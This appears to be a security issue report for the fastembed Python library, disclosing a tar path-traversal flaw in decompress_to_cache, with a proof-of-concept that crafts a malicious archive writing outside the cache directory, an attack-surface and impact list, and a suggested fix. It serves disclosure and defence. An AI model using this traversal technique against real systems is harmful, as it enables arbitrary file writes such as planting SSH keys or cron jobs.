Summary
The decompress_to_cache method uses tarfile.extractall() without sanitizing member paths, making it vulnerable to Zip Slip / Tar Slip (CVE-2007-4559 class). A malicious tar archive can write files to arbitrary locations outside cache_dir.
Note: This is related to but distinct from #327, which tracks the DeprecationWarning/platform compatibility aspect. This issue specifically addresses the security vulnerability — path traversal allowing arbitrary file writes.
Affected Code
File: fastembed/common/model_management.py, lines 304–311
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    # ...
    with tarfile.open(targz_path, "r:gz") as tar:
        tar.extractall(
            path=cache_dir,  # No filter, no member sanitization
        )
Reproduction
import tarfile, os, tempfile, io

# Create a malicious tar that writes outside the intended directory
with tempfile.NamedTemporaryFile(suffix='.tar.gz', delete=False) as f:
    evil_tar = f.name
with tarfile.open(evil_tar, 'w:gz') as tar:
    payload = b"PWNED"
    info = tarfile.TarInfo(name="../../tmp/fastembed_pwned.txt")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

# Call decompress_to_cache with this tar
cache_dir = tempfile.mkdtemp()
from fastembed.common.model_management import ModelManagement
ModelManagement.decompress_to_cache(evil_tar, cache_dir)

# File written outside cache_dir (assumes cache_dir is a direct child of /tmp
# and the interpreter applies no extraction filter by default):
print(os.path.exists("/tmp/fastembed_pwned.txt"))  # True
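The escape can also be checked without extracting anything. The following is a minimal sketch using only the standard library; `resolves_outside` is a hypothetical helper name, not part of fastembed, and the `/srv/cache` path is purely illustrative. It resolves where a member name would land and compares that with the extraction root.

```python
import os


def resolves_outside(dest_dir: str, member_name: str) -> bool:
    """Return True if member_name would be written outside dest_dir."""
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, member_name))
    # commonpath equals root only when target is root itself or lives under it.
    return os.path.commonpath([root, target]) != root


if __name__ == "__main__":
    # The member name from the reproduction escapes the extraction root.
    print(resolves_outside("/srv/cache", "../../tmp/fastembed_pwned.txt"))
    # An ordinary relative member stays inside it.
    print(resolves_outside("/srv/cache", "model/config.json"))
```

Using `os.path.commonpath` rather than a string prefix test avoids treating a sibling such as `/srv/cache_evil` as if it were inside `/srv/cache`.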
Attack Surface
- Custom model URLs via add_custom_model() pointing to attacker-controlled servers
- Compromised HuggingFace repos or GCS buckets (supply chain attack)
- MITM on HTTP redirects
Impact
- Arbitrary file write to any path writable by the process (SSH keys, cron jobs, Python packages, shell configs)
- On Python 3.14, the default filter changes to 'data', which will silently change extraction behavior and may break existing archives
Suggested Fix
Add path filtering to block traversal:
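@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    with tarfile.open(targz_path, "r:gz") as tar:
        if hasattr(tarfile, "data_filter"):
            # Python 3.12+ (and patched releases of older versions):
            # the 'data' filter blocks traversal
            tar.extractall(path=cache_dir, filter="data")
        else:
            # Older interpreters: validate every member before extracting
            root = os.path.realpath(cache_dir)
            for member in tar.getmembers():
                member_path = os.path.realpath(os.path.join(root, member.name))
                # Allow the root itself (archives often contain a "." entry)
                if member_path != root and not member_path.startswith(root + os.sep):
                    raise ValueError(f"Unsafe tar member path: {member.name}")
                # A link can point outside cache_dir even if its own path is safe
                if member.issym() or member.islnk():
                    raise ValueError(f"Unsafe tar link member: {member.name}")
            tar.extractall(path=cache_dir)
    # ... rest of the method unchanged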
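For testing the approach outside fastembed, the same idea can be written as a standalone function. This is a sketch under stated assumptions, not the project's implementation: `safe_extract` is a hypothetical name, and rejecting every symlink and hard link is a deliberately strict choice that may be too restrictive for archives that legitimately contain links.

```python
import os
import tarfile


def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a .tar.gz archive, refusing members that escape dest_dir."""
    root = os.path.realpath(dest_dir)
    with tarfile.open(archive_path, "r:gz") as tar:
        members = tar.getmembers()
        for member in members:
            # Links can redirect later writes, so this sketch rejects them outright.
            if member.issym() or member.islnk():
                raise ValueError(f"Link member not allowed: {member.name}")
            target = os.path.realpath(os.path.join(root, member.name))
            # commonpath equals root only for root itself or paths beneath it.
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"Unsafe tar member path: {member.name}")
        if hasattr(tarfile, "data_filter"):
            # Interpreters with extraction filters: apply 'data' as a second layer.
            tar.extractall(path=root, members=members, filter="data")
        else:
            tar.extractall(path=root, members=members)
```

All members are validated before anything is written, so a malicious entry late in the archive cannot leave a partially extracted tree behind.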
Found via automated codebase analysis. Confirmed independently by three reviewers (Claude, Codex, Gemini).